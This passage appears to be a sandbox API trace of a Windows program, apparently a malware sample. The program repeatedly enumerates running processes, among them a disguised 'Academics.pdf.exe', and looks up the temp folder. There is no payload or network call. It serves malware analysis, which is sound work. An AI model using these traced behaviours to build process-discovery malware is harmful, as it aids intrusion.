th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0315.833] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0315.834] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0315.835] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0315.835] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0315.836] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0315.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0315.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0315.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0315.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.840] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.841] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0315.842] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.843] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0315.843] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.844] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0315.845] CloseHandle (hObject=0x294) returned 1 [0315.845] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.845] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.845] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0315.847] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.848] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0315.849] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0315.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0315.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.852] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0315.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0315.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0315.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0315.855] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.856] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.859] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.859] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0315.860] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.861] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.862] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0315.863] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0315.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0315.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0315.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0315.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0315.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0315.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0315.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0315.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0315.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0315.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0315.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0315.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0315.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0315.876] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0315.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0315.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0315.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0315.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0315.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0315.888] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0315.891] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0315.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0315.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0315.896] CloseHandle (hObject=0x294) returned 1 [0315.896] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.897] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.897] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0315.899] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0315.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0315.901] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.902] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0315.903] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.903] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0315.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0315.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0315.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0315.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.925] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.925] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.925] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.925] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0315.925] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0315.925] 